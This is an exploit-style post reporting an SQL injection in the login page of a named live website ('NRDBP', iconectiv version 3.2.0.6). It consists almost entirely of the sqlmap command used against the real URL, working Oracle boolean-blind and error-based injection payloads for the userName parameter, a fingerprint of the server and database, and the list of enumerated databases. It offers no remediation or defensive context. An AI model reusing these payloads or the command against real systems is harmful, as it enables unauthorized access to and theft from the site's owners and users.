# Exploit Title: (EAP 6) NRDBP - Login İconectiv Version 3.2.0.6 | SQL Injection Vulnerability
# Author: Чингис хаан
# Tested On: Kali Linux
# sqlmap -u sqlmap -u "https://www.nrdbp.gr/NrdbpWeb/login.do" --form --current-db --dbs --banner --batch
---------------------------------------------------------------------------------------------------
NRDBP - Login
(EAP 6)
İconectiv
Version 3.2.0.6
https://www.nrdbp.gr/NrdbpWeb/login.do
---
Parameter: userName (POST)
Type: boolean-based blind
Title: Oracle AND boolean-based blind - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: userName=RopA' AND (SELECT (CASE WHEN (1251=1251) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,1251) END) FROM DUAL) IS NULL-- nLLF&password=&submit=Login&face=kpDr&systemTime=20:56:19
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
Payload: userName=RopA' AND 8689=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(118)||CHR(112)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (8689=8689) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))-- DUzD&password=&submit=Login&face=kpDr&systemTime=20:56:19
---
the back-end DBMS is Oracle
web server operating system: Linux Red Hat Enterprise 6 (Santiago)
web application technology: JSP 2.2, Apache 2.2.15
back-end DBMS: Oracle
banner: 'Oracle Database 11g Enterprise Edition Release 11.2.0.4.0 - 64bit Production'
available databases [18]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] NRDBP
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
